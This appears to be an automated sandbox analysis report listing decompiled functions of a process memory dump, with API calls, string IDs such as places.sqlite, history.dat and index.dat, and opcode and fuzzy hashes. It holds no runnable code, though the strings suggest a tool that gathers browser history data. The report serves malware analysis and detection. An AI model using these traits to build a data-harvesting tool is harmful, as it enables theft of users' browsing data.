                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                  Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                  • memset.MSVCRT ref: 00403A55
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                  • String ID: history.dat$places.sqlite
                                                  • API String ID: 3093078384-467022611
                                                  • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                  • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                  Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                  • GetLastError.KERNEL32 ref: 00417627
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$File$PointerRead
                                                  • String ID:
                                                  • API String ID: 839530781-0
                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                  Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID: *.*$index.dat
                                                  • API String ID: 1974802433-2863569691
                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                  Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@mallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3831604043-0
                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                  Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$FilePointer
                                                  • String ID:
                                                  • API String ID: 1156039329-0
                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                  Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ChangeCloseCreateFindNotificationTime
                                                  • String ID:
                                                  • API String ID: 1631957507-0
                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                  Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                  • String ID:
                                                  • API String ID: 1125800050-0
                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                  Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d
                                                  • API String ID: 0-2564639436
                                                  • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                  • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                  Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: BINARY
                                                  • API String ID: 2221118986-907554435
                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                  Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                  • String ID:
                                                  • API String ID: 1161345128-0
                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                  Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /stext
                                                  • API String ID: 2081463915-3817206916
                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                  Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: .'w
                                                  • API String ID: 2081463915-220740710
                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                  Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                  • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                  • String ID:
                                                  • API String ID: 159017214-0
                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                  Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3150196962-0
                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                  Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: malloc
                                                  • String ID: failed to allocate %u bytes of memory
                                                  • API String ID: 2803490479-1168259600
                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                  Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                  Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmpmemset
                                                  • String ID:
                                                  • API String ID: 1065087418-0
                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                  Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID:
                                                  • API String ID: 1297977491-0
                                                  • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                  • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                  • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                  • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                  Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                    • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                    • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                    • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                  • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                  • String ID:
                                                  • API String ID: 1481295809-0
                                                  • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                  • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                  • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                  • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                  Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 3150196962-0
                                                  • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                  • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                  • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                  • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                  Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$PointerRead
                                                  • String ID:
                                                  • API String ID: 3154509469-0
                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                  Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                  • String ID:
                                                  • API String ID: 4232544981-0
                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
